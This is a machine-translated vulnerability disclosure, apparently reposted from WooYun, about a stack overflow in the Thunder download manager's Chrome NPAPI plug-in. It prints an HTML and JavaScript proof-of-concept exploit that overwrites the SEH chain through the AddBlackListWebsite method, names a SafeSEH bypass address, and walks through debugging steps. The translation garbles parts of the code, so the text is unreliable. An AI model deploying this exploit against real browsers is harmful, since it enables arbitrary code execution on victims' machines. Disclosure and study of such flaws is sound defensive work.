Thunder chrome plug-in stack overflow can cause arbitrary code execution

Source: Internet
Author: User

Thunder chrome plug-in stack overflow can cause arbitrary code execution

Thunder is an Internet download software developed by thunder. Thunder is based on multi-resource hyper-Threading Technology.
Download the software. When installing thunder, the wizard will recommend that you install browser extensions.
Thunder Download Extension for Chrome Extension
In the stack overflow vulnerability, users installed with Thunderbolt chrome extensions may execute arbitrary code when Browsing malicious web pages.

Thanks: test environment:

Windows 2003 Default Configuration



When you view the manifest. json file of the thunder chrome extension, it is found that the extension uses the NPAPI (Netscape

Plug-in Application Programming Interface and web scene plug-in Application Interface) implements xl_chrome.dll,

The public attribute is true, so xl_chrome can be called by any webpage.

POC:
 

<Embed type = "application/xl_chrome_plugin" id = "xl_chrome_plugin"> <script> var plugin = document. getElementById ("xl_chrome_plugin"); function exploit () {var I = 0; var exploit_string = ''; var nop = '\ x72 \ x00 \ x72 \ x00 '; // jz next_code; var safeseh_addr = '\ x0b \ x0b \ x27 \ x00 '; // call [ebp + 30 h] var jz_seh_addr = '\ x74 \ x22 \ x74 \ x22'; // skip sehwhile (I <20012) {I + = 1; exploit_string + = 'a';} exploit_string + = jz_seh_addr; exploit_string + = safeseh_addr; I = 0; while (I <20000) {I + = 1; exploit_string + = '\ x72 \ x00 \ x72 \ x00'; // nop} plugin. addBlackListWebsite (exploit_string) ;}</script> // large wooyun replaces a forward slash with two forward slashes.

Stack overflow exists in the AddBlackListWebsite implemented by xl_chrome (AddBlackListPage should also exist, others are not tested)



View Program-related protection using mona
 

You need bypass SafeSEH to find the bypass SafeSEH address.

Finally, select 0x00270b0b as the jump address.



Command Line

 

chrome.exe --plugin-startup-dialog





The id of the process that Immunity Debugger attaches to the chrome pop-up dialog box. chrome opens the POC page, F12 opens the console, and enters exploit () (to facilitate debugging and writing a function), a write exception is triggered.
 

I forgot to mention that because the program carries GS, it can only overwrite SafeSEH and trigger exceptions to enter the exception processing function,

At this time, the exception chain is overwritten by 0x00270B0B, which is the address where we select bypass SafeSEH and finally return to our controllable location.

The rest is the shellcode problem.

Solution:

NPAPI, google has long said it is about to be abandoned. Why does Thunder dare to continue using it?

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.